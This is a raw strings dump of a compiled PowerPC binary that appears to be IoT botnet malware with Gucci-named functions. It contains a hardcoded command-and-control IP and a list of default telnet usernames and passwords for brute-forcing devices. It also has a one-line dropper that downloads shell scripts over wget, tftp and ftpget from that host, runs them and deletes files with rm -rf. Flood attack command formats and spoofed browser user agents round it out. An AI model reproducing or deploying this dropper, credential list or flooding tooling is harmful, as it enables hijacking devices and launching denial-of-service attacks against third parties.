/lib/ld-uClibc.so.0
libc.so.0
strcpy
chroot
waitpid
ioctl
sysconf
getdtablesize
recv
connect
sigemptyset
getpid
prctl
execl
dup2
malloc
sleep
socket
select
isspace
sigaddset
send
pipe
write
inet_addr
ntohl
chdir
setsockopt
strcasestr
strstr
signal
read
strncpy
htonl
sendto
bcopy
strtok
__uClibc_main
memset
srand
inet_ntoa
getppid
time
strcmp
gethostbyname
sprintf
vfork
getsockopt
htons
__errno_location
atoi
_exit
strlen
alula
open
toupper
strchr
setsid
fcntl
close
free
sigprocmask
getsockname
_edata
__bss_start
_end
78	y
Degas are we not drawn onward no In union drawn onward to new eras aged
=)<o8	
:} J
:} J
:} J
}a[xN
9@I^
:} J
Cx= 
}@Sx= 
}`HP= 
:} J
:} J
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
:} J
H0}k
x}$Kx8
}g[xH
}a[xN
}%KxH
}a[xN
}a[xN
}%KxH
}a[xN
}a[xN
HP|	
HP|	
}a[xN
}a[xN
}a[xN
}a[xN
0} Z
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
}a[xN
}a[xN
}a[xN
}%KxH
x}d[x}%KxK
}a[xN
:}#Kx8
}a[xN
x}%KxH
x}$Kx8
}a[xN
}a[xN
:} J
God A red nugget A fat egg under a dog
}a[xN
}c[x|
}c[x|
}a[xN
}a[xN
}a[xN
} HP
}a[xN
}%KxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
x}$Kx8
}a[xN
}c[x|
:} J
H0}k
}%Kx8
}g[xH
x}'KxH
}a[xN
:}ISx8	
}@SxT
}a[xN
}a[xN
} HP
} HP
} HP
} HP
} HP
}a[xN
:} J
H0}k
x}$Kx8
}g[xH
|=|`
{I|`
{}|`
}a[xN
>p} 
p}`XP
} HP
z}|i
>p} 
p}`XP
} HP
z9|i
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
yi|i
>p} 
p}`XP
} HP
y%|i
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>}CSx}
;x}&Kx}g[x|
u)|`
}a[xN
}a[xN
>} Kx|
}a[xN
}a[xN
}a[xN
}a[xN
q}|`
}CSx|
x}e[xH
q=|`
}a[xN
p}`XP
} HP
:} J
,}h[xL
oQ|`
x}%KxH
}a[xN
m]|`
}a[xN
}CSx}d[x|
m18`
k1|`
la|`
}#Kx8
ki8`
}%KxH
kA8`
kY|i
8} J
j	|k
8} J
8} J
8} J
8} J
x}$Kx8
i5|i
jq|i
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}%Kx8
}g[xH
h)|`
8} J
}&Kx}g[xH
8} J
8} J
8} J
8} J
8} J
8} J
8} J
8} J
gQ|`
}a[xN
}#Kx8
e%|`
}%KxH
8} J
8} J
8} J
8} J
8} J
x}$Kx8
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}%Kx8
}g[xH
8} J
}&Kx}g[xH
8} J
8} J
8} J
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}&Kx}g[xH
8} J
8} J
a-|`
}a[xN
}%KxH
}#Kx8
:} J
[y|k
\a|`
x}$Kx8
:} J
H0}k
}%Kx8
}g[xH
Yy|`
}&Kx}g[xH
}c[x
:} J
:} J
V5|`
}c[x
:} J
:} J
U}|`
TU|`
}c[x
:} J
:} J
}e[x}FSx|
RM|`
Q)|`
OA|`
}%KxH
}'Kx9
O9|`
N1|`
MQ|k
x}e[x8
ME|`
>}c[x|
}'Kx9
LY|`
>}c[x|
}a[xN
I-|k
x}e[x8
H-|`
HM|`
G}|`
GI|`
>}c[x|
FE|i
}'Kx9
>}c[x|
EE|`
}a[xN
De|`
CM|`
Dm|`
DE|`
Cm8`
C}|}
Bm|`
CA|`
CU|i
C1|i
Bq|`
B=|`
B!|`
AA8`
@u|i
@Q|i
@-|`
?i|`
>1|`
>u8`
=U|`
=)|y
<5|`
<)|`
;a|`
:E8`
9U|`
99|`
9I|`
8-|`
8)|`
8	|`
7i8`
7)8`
6y|`
}a[xN
}%KxH
6m= 
:} J
}c[x|
41= 
5y|`
4!|`
x}$Kx
}a[xN
3m|`
4-|`
x}%KxH
4=|`
}%KxH
A Santa lives evil at NASA
x}$KxH
}a[xN
1== 
0e8`
1]|}
0M|`
1-8`
1=|}
0-|`
15= 
/a= 
:}ISx8	
,e|`
+A|i
x}#Kx8
x}$KxH
x}$Kx8
 51.15.206.104
root
support
telnet
admin
user
guest
admin1
administrator
Administrator
666666
888888
ubnt
tech
mother
service
supervisor
mg3500
daemon
default
operator
xc3511
vizxv
xmhdipc
juantech
123456
54321
12345
pass
admin1234
1111
smcadmin
1234
password
klv123
klv1234
Zte521
hi3518
jvbzd
anko
zlxx.
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm
fucker
merlin
aquario
1001chin
zsun1188
GM8182
ogin
sername
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
BusyBox
uilt-in
inux
shell
help
commands
/tmp/
/var/tmp/
/bin/
/dev/
(null)
/bin/sh
:>%$#
%d.%d.%d.%d
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Do nine men interpret Nine men I nod
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Borrow or rob
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Eleele
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4
Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre
Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
rapes
REPORT %s:%s:%s
shell
enable
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.15.206.104/rtyegegg.sh; chmod 777 rtyegegg.sh; sh rtyegegg.sh; tftp 51.15.206.104 -c get tftpp1.sh; chmod 777 tftpp1.sh; sh tftpp1.sh; tftp -r tftpp2.sh -g 51.15.206.104; chmod 777 tftpp2.sh; sh tftpp2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.15.206.104 ftpp1.sh ftpp1.sh; sh ftpp1.sh; rm -rf rtyegegg.sh tftpp1.sh tftpp2.sh ftpp1.sh; rm -rf *
HTTP
STD <target> <port> <time>
HOLD
JUNK
CNC <target> <port> <time>
8.8.8.8
/proc/net/route
	00000000	
gucci
PING
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.interp
.hash
.dynsym
.dynstr
.rela.plt
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.dynamic
.data
.got
.sdata
.sbss
.bss
.comment
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.3069
p.3067
__do_global_dtors_aux
call___do_global_dtors_aux
object.3150
frame_dummy
call_frame_dummy
initfini.c
libc/sysdeps/linux/powerpc/crti.S
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
call___do_global_ctors_aux
libc/sysdeps/linux/powerpc/crtn.S
libc/sysdeps/linux/powerpc/crt1.S
new.c
i.4237
printchar
prints
printi
print
fdopen_pids
hextable
_DYNAMIC
_GLOBAL_OFFSET_TABLE_
chroot
strcpy
recvLine
GucciHTTP
waitpid
ioctl
sysconf
getdtablesize
contains_fail
recv
connect
numpids
sigemptyset
initConnection
getRandomPublicIP
usernames
read_until_response
zprintf
getpid
getHost
wildString
prctl
makeRandomStr
getRandomIP
execl
sclose
trim
dup2
malloc
sleep
__dso_handle
tcpcsum
reset_telstate
Beeb
fdpclose
socket
select
isspace
sigaddset
makeIPPacket
sockprintf
send
_init
Tacocat
parseHex
pipe
csum
write
inet_addr
ntohl
__deregister_frame_info
ourIP
chdir
connectTimeout
setsockopt
sendSTD
tmpdirs
strcasestr
_start
strstr
init_rand
rand
signal
read
_SDA_BASE_
strncpy
htonl
sendto
currentServer
bcopy
strtok
fork
gotIP
__uClibc_main
lilpvmp
processCmd
__bss_start
getOurIP
get_telstate_host
memset
main
listFork
negotiate
srand
inet_ntoa
getppid
time
fdpopen
strcmp
advances2
data_start
matchPrompt
gethostbyname
advance_state
_fini
contains_success
sprintf
fdgets
socket_connect
fails
vfork
scanPid
rand_cmwc
advances
getsockopt
contains_string
contains_response
_edata
_end
htons
GucciRepresentative
__errno_location
uppercase
exit
sendJUNK
atoi
successes
GucciGang
_exit
szprintf
strlen
open
toupper
strchr
__data_start
setsid
_Jv_RegisterClasses
macAddress
readUntil
fcntl
read_with_timeout
__register_frame_info
close
passwords
sendHOLD
mainCommSock
pids
sendCNC
free
sigprocmask
getsockname
